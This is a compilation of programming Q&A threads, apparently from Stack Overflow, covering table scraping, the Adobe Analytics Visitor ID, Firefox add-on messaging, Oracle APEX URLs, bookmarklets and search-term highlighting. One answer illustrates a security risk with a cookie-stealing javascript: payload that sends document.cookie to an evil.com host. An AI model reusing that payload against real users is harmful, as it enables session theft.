parsing table from a dynamically changing url source - parsing

I want to parse tables spead over many pages from the below url
https://www.marketscreener.com/tools/stock-screener/
However, the page url address dynamically changes on every click (even though the data in the tables remains unchanged). I am not very well versed with recent website/webpage development technologies. I have some experience with requests/lxml.xpath but how do i pass the dynamic url address to 'requests.get' I tried to get the source container from the Network tab in chrome, but that too doesn't seem to work.
Edit_1:
further to #Andrej Kesely comments, basically my desired output is the href data contained in .//table//tbody/td/tr//a href which I can get with routine lxml.xpath function. My real challenge precedes that, it is that the url address keeps dynamically changing. So, I am having trouble passing static url at requests.get level. Hope I am making myself clear.

Related

Set the Visitor ID in Adobe Analytics through DTM

I'm trying to set the Visitor ID in Adobe Analytics through DTM.
Above the s_code I have:
var visitor = new Visitor("xxxx")
visitor.trackingServer = "xxx.xx.xx.omtrdc.net"
I've created a data element where the legacy code used to call the
Visitor.getInstance("xxxx");
and set the Visitor ID to %Visitor ID%
That's not working however, and my visitor ID is always just set to %Visitor ID% and obviously not reading any values. I'd really appreciate any input that someone can give me.
Thanks,
Mike
The Visitor ID pops s.visitorID and is in general related to visitor id, but is not the same as s.visitor which is what gets popped for the VisitorAPI integration. DTM does not currently have a built-in field for the s.visitor variable, so you will have to set it yourself within the config, either in the Library Management code editor (assuming you are opting to c/p the core lib and not the "Managed by Adobe" option) or else in the Custom Page Code section.
Since you are popping it in a data layer first, you can reference the data layer like this:
s.visitor = _satellite.getVar('Visitor ID');
NOTE: A separate potential issue you may have is with whether or not the Visitor object is available for your data element. Since data elements are the first thing to be evaluated by DTM, you will need to ensure that the VisitorAPI.js library is output before your top page DTM script include.
If this is a problem for you, or if you are wanting to host VisitorAPI.js within DTM, then you may need to adjust where you are popping that stuff. For example, place the VisitorAPI core code above the custom code as the first stuff within the data element, before:
var visitor = new Visitor("xxxx") visitor.trackingServer = "xxx.xx.xx.omtrdc.net
Or, don't use the data element at all. Instead, put the VisitorAPI code within the Adobe Analytics custom code or core lib section and pop all that stuff (aboove the s.visitor assignment). Or a number of other methods; point is, VisitorAPI stuff must be loaded before the data element can make use of it, same as it must be loaded before Adobe Analytics can make use of it.
So DTM is changing pretty fast and furious right now. They have a "Marketing Cloud Service ID" that works well. Before I used that, however, I did find a way to fix the code. Crayon Violent was right, as usual, that the problem was that the script wasn't available yet. I fixed this by putting the following code in between the VisitorAPI.js and the AppMeasurement stuff in the DTM managed library.
var aA = new AppMeasurement();
aA.visitorNamespace="companyname";
aA.visitor = Visitor.getInstance("companyname");
In addition, there were also some issues using my localhost for testing while trying to see if I had this correct or not. If you are having issues and think you have it correct, it may be worthwhile to elevate it to a different environment.

Access specific extension object data from page code

I'm trying to build an addon that will observe and collect XHR and image responses received on a page and make them available to page script (on that page) for further inspection.
In my 'http-on-examine-response' observer code, I push URLs I'm interested in, into an array for their associated window, into an object, something like this -
myWindowId = resp.outerWindowID+'-'+resp.currentInnerWindowID;
storedResponses[myWindowId].push(subject.URI.spec);
(I thought that approach may be better than using tab references to identify unique source windows)
The relevant arrays are updated automatically as any page makes a request.
I'd like to be able to query the relevant array from page script or a bookmarklet at any time.
Should I set up port.on..., or postMessage() communication between the page/bookmarklet, content script and extension, or use a pageMod to write the appropriate array directly to an unsafeWindow global object on the relevant page?
I couldn't figure out how to make a pageMod write a specific array to a specific page as soon as the new responses were observed.
Full source is here -
https://builder.addons.mozilla.org/addon/1064905/latest/
I think it's all working, apart from getting the data back on to the page.
With help from Wladimir Palant, I found that XPCNativeWrapper.unwrap() is defined and does what I needed from the SDK module context. It allowed me to set variables directly in a window from my addon.
More info about wrappers here -
https://developer.mozilla.org/en/XPCNativeWrapper

How to dynamically generate url for image map in Oracle ApEx?

The scenario:
I have an ApEx page which pulls a record from a table. The record contains an id, the name of the chart (actually a filename) and the code for an image map as an NVARCHAR2 column called image_map.
When I render the page I have an embedded HTML region which pulls the image in using the #WORKSPACE_IMAGES#&P19_IMAGE. substitution as the src for the image.
Each chart has hot spots (defined in the image_map html markup) which point to other charts on the same ApEx page. I need to embed the:
Application ID (like &APP_ID.)
Session (like &APP_SESSION.)
My problem:
When I try to load the &APP_ID as part of the source into the database it pre-parses it and plugs in the value for the ApEx development app (e.g. 4500) instead of the actual target application (118).
Any help would be greatly appreciated.
Not a lot of feedback - guess I'm doing something atypical?
In case someone else is trying to do this, the workaround I ended up using was to have a javascript run and replace some custom replacement flags in the urls. The script is embedded in the template of the page and assigns the APEX magic fields to local variables, e.g.:
var my_app_id = '&APP_ID';
Not pretty, but it works...
Ok - I think I've left this open long enough... In the event that anyone else is trying to (mis)use apex in a similar way, it seems like the "apex way" is to use dynamic actions (which seem stable from 4.1.x) and then you can do your dynamic replace from there rather than embedding js in the page(s) themselves.
This seems to be the most maintainable, so I'll mark this as the answer - but if someone else has a better idea, I'm open to education!
I found it difficult to set a dynamic URL on a link to another page - directly - attempting to include the full URL as an individual link target doesn't work, at least in my simplistic world, I'm not an expert (as AJ said: any wisdom appreciated).
Instead, I set individual components of the url via the link, and a 'Before Header' PL/SQL process on the targeted page to combine the elements into a full url and assign it to the full url page-item:
APEX_UTIL.set_session_state(
'PG_FULL_URL',
'http...'||
v('PG_URL_COMPONENT1')||
v('PG_URL_COMPONENT2')||
'..etc..'
);
...where PG_FULL_URL is an item of Type 'Display Image', 'Based On' 'Image URL stored in Page Item Value'.
This is Apex 5.1 btw, I don't know if some of these options are new in this release.

Combine URL and a javascript bookmarklet together

I need to access some data in someone's site. The way to get to that page is visiting http://www.foosite.com and click a link which has javascript:foo(); to bring out the real data.
foo() is like:
function foo(param){
createXXXCookie('COOKIE_NAME', param, 60);
window.location.href="/current/location";
}
So this is basically setting the cookie and reload the page again. During page load, the document ready reads COOKIE_NAME and display the corresponding data.
I want to use MS Excel to grab some data from this page. So I was looking for a one go way to get the data. Since in browser address bar, I can enter http://www.foosite.com first and then enter javascript:foo(); to invoke foo(). I was wondering if combining the URL and the bookmarklet, like http://www.foosite.com;javascript:foo(); could work? I actually tried this, but it seems IE/FF/GC will skip javascript:... part and just proceed the first part of URL.
This is not possible.
Had it been possible, it would be a deadly security hole.
Email someone a shortlink to http://somebank.com;javascript:$.getScript('http://evil.com/steal?payload=' + encodeURIComponent(document.cookie)), and move on from there to auto-submitting forms.

How does a website highlight search terms you used in the search engine?

I've seen some websites highlight the search engine keywords you used, to reach the page. (such as the keywords you typed in the Google search listing)
How does it know what keywords you typed in the search engine? Does it examine the referrer HTTP header or something? Any available scripts that can do this? It might be server-side or JavaScript, I'm not sure.
This can be done either server-side or client-side. The search keywords are determined by looking at the HTTP Referer (sic) header. In JavaScript you can look at document.referrer.
Once you have the referrer, you check to see if it's a search engine results page you know about, and then parse out the search terms.
For example, Google's search results have URLs that look like this:
http://www.google.com/search?hl=en&q=programming+questions
The q query parameter is the search query, so you'd want to pull that out and un-URL-escape it, resulting in:
programming questions
Then you can search for the terms on your page and highlight them as necessary. If you're doing this server side-you'd modify the HTML before sending it to the client. If you're doing it client-side you'd manipulate the DOM.
There are existing libraries that can do this for you, like this one.
Realizing this is probably too late to make any difference...
Please, I beg you -- find out how to accomplish this and then never do it. As a web user, I find it intensely annoying (and distracting) when I come across a site that does this automatically. Most of the time it just ends up highlighting every other word on the page. If I need assistance finding a certain word within a page, my browser has a much more appropriate "find" function built right in, which I can use or not use at will, rather than having to reload the whole page to get it to go away when I don't want it (which is the vast majority of the time).
Basically, you...
Examine document.referrer.
Have a list of domains to GET param that contains the search terms.
var searchEnginesToGetParam = {
'google.com' : 'q',
'bing.com' : 'q'
}
Extract the appropriate GET param, and decodeURIComponent() it.
Parse the text nodes where you want to highlight the terms (see Replacing text with JavaScript).
You're done!

Resources